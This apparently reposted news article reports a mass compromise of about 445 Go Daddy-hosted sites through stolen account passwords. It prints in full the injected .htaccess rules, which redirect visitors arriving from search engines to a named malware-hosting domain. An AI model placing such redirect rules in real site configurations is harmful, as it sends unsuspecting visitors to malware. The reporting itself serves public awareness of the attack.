The Reason Behind The Massive Cyber-attack On godaddy.com Was A Malware


Hundreds of Go Daddy sites were compromised to point towards a site hosting malware last weekend. The mass hack of around 445 sites involved the injection of hostile code into the .htaccess files of the sites. 
Code:-
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L] 
Go Daddy quickly removed the hostile code before working with its customers to take back full control of the sites, which were reportedly compromised by a password hack.
Go Daddy’s chief information security officer, Todd Redfoot, told Domain Name Wire: "The accounts were accessed using the account holder’s username and password.”
It's unclear how the passwords needed to pull off the attack were obtained, but some sort of targeted phishing attack is one likely explanation. Go Daddy's investigation into the attack continues but Redfoot suggested the blame for the mass hack was outside Go Daddy's control.
"This was not an infrastructure breakdown and should not impact additional customers," he said.
Web security monitoring firm Securi warned of the mass hack on Thursday. Its blog post about the attack suggests the malicious code was targeted towards surfers visiting the affected domains via Google or other search engines rather than those who had arrived directly. Such trickery is often part and parcel of search engine manipulation attacks designed to redirect surfers hunting for content related to items in the news towards scareware portals. This kind of trickery often takes advantage of insecure WordPress installations and the like, so the apparent use of password-snaffling trickery in this case suggests the bad guys are becoming more aggressive in their hunt for sites they can abuse for their own malicious ends.

-News Source (Register)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LINK TO OUR HOME PAGE :
Voice Of GREYHAT is a non-profit Organization propagating news specifically related with Cyber security threats, Hacking threads and issues from all over the spectrum. The news provided by us on this site is gathered from various Re-Sources. if any person have some FAQ's in their mind they can Contact Us. Also you can read our Privacy Policy for more info. Thank You ! -Team VOGH
If you enjoyed VOGH News, Articles Then Do Make sure you to Subscribe Our RSS feed. Stay Tuned with VOGH and get Updated about Cyber Security News, Hacking Threads and Lots More. All our Articles and Updates will directly be sent to Your Inbox. Thank You! -Team VOGH

Categories: , ,

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...